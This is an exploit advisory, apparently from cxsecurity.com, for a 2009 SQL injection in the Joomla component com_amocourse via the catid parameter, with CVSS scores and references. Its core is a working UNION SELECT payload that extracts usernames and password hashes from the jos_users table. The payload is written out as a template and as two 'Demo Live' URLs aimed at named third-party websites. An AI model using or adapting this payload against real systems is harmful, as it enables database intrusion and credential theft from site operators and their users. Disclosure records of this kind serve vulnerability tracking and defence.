Joomla Component com_amocourse (catid) SQL-injection Vulnerability

2009.07.28
Credit: Chip D3 Bi0s
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Joomla Component com_amocourse (catid) SQL-injection Vulnerability ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ################################################### [+] Author : Chip D3 Bi0s [+] Email : chipdebios[alt+64]gmail.com [+] Greetz : d4n1ux + x_jeshua + eCORE + rayok3nt [+] Vulnerability : SQL injection ################################################### Example: http://localHost/path//index.php?option=com_amocourse&task=view&view=category&catid=n[SQL code] n = catid valid [SQL code] +union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12+from+jos_users-- Demo Live (1) http://www.kaieden.com/joomla/index.php?option=com_amocourse&task=view&view=category&catid=29+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12+from+jos_users-- Demo Live Mambo (2) http://www.tangotherapy.co.uk/index.php?option=com_amocourse&task=view&view=category&catid=29+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12+from+jos_users-- +++++++++++++++++++++++++++++++++++++++ #[!] Produced in South America +++++++++++++++++++++++++++++++++++++++

References:

http://xforce.iss.net/xforce/xfdb/51358
http://www.securityfocus.com/bid/35489
http://www.milw0rm.com/exploits/9016


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top